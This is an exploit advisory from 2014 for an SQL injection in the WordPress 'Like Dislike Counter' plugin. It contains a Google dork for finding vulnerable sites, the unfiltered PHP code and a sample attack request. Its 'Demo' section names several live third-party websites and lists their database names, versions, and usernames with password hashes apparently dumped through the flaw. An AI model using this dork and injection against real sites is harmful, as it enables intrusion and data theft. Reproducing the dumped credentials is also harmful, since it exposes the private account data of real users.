########################################### # Title : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability # Risk : High+/Critical # Exploit Author : XroGuE # Google Dork : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php # Plugin Version : 1.2.3 # Plugin Name : Like Dislike Counter # Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip # Vendor Home : www.wpfruits.com # Date : 2014/09/05 # Tested in : Win7 - Linux # ########################################### # This Vulnerability Available in Both Version of This Plugin (Free & Pro Version). # # PoC : # # http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php # # Vulnerable Page : ajax_counter.php # # if (!$changedDir)$changedDir = preg_replace('|wp-content.*$|','',__FILE__); # include_once($changedDir.'/wp-config.php'); # if(isset($_COOKIE['ul_post_cnt'])) # { # $posts_present=$_COOKIE['ul_post_cnt']; # } # else # { # $posts_present=array(); # } # // Here ------------------------> Inputs Not Filtered ! :| # $post_id=$_POST['post_id']; # $up_type=$_POST['up_type']; # // Here <------------------------ # if($up_type=='c_like'||$up_type=='c_dislike') # { # $for_com='c_'; # } # else # { # $for_com=''; # } # if(!in_array($for_com.$post_id,$posts_present)) # { # update_post_ul_meta($post_id,$up_type); # } # echo get_post_ul_meta($post_id,$up_type); # ############################################ # POST wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21 # Accept: */* # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Content-Type: application/x-www-form-urlencoded; charset=UTF-8 # X-Requested-With: XMLHttpRequest # Referer: http://localhost/wp/ # Content-Length: 24 # Connection: keep-alive # Pragma: no-cache # Cache-Control: no-cache # post_id=1&up_type=like ######################################## # # Demo : # # http://plugins.wpfruits.com/like-dislike/wp-content/plugins/pro-like-dislike-counter/ldc-ajax-counter.php # => database: tikendra_wpf-plugins # => Version : 5.5.37-35.1 # # # # http://prettyhipsounds.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php # => Database:pre1302309360573 # => Version : 5.0.96-log # => Users : cemruso:$P$BKlsLJRwcdsKcdRdwyrqLbM7tJKENC.,manolyasagisman:$P$B8eZQzrHSTuWiF4bFX3Yrm0cI7rAFP1,ekinsezgen:$P$BskJZO4e6qkLT5HX2U928SRhO/Ekg4.,hedazs35:$P$BoBHjAZAJCWvXb7IF9t/Kb0DJpGoir1,yhdbhet5e:$P$Bsl67YzrizI.29yr1y1BzbUJmkrJuT1,olandonanto:$P$BVyD5JJKOuRMR/Cq6u.VFWP.HV8Okn1,vt1f6zfo0:$P$BMSQwc1hKlJvo.4/5oddH62gKFrfBL1,lxbc4fyi:$P$BJD5FOSx # # # # http://www.dropboxwiki.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php # => Database: wp_dropboxwiki # => Version : 5.5.31-30.3-log # => prefix : u2ffvh # => Users : nathan:$P$B9cFMVh7xTnh9ewmBDylwcn1zOMjTa/,andy:$P$BIGexE1YxoK0Y6AI4C29X6yse039Gl1,chris:$P$ByJuX/oNlNcCni7NO8/mTAtUQ/Bz/A/,mark:$P$BdQh8JbAEbtwnZhFZQA96afhc4e/Kq/,tommy:$P$BWHket1yb/Aybpm9RViVcw2o6UcAzg.,Endeavour:$P$B0gdPF/kjiO4nqin.WhHEkwlFPyC0/0,dgw:$P$B6gYWX8G/1w5vXXcmX.Q4cIrl3eL10.,ops@axentra.com:$P$BSjAU.VnHzE62yuXLEeOvwci/CeWOT/,jr # # # # http://xploit.ir/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php # => Database: mrcicili_xploitdb # => users : xploitadminblog:$P$BVKlsUqLMQNiARyZYxQGY0mFB4.DjG0,Leonie4295:$P$Btyo/bqbXcpoICDO7gcbVyJlcC4yWa0,p-41:$P$BAItbiw3K7uFMT70JZba2IfNOGWgjL0 # ######################################### # # Founded By : XroGuE # Website : http://www.Att4ck3r.ir # E-Mail : info[at]att4ck3r[Dot]ir # #########################################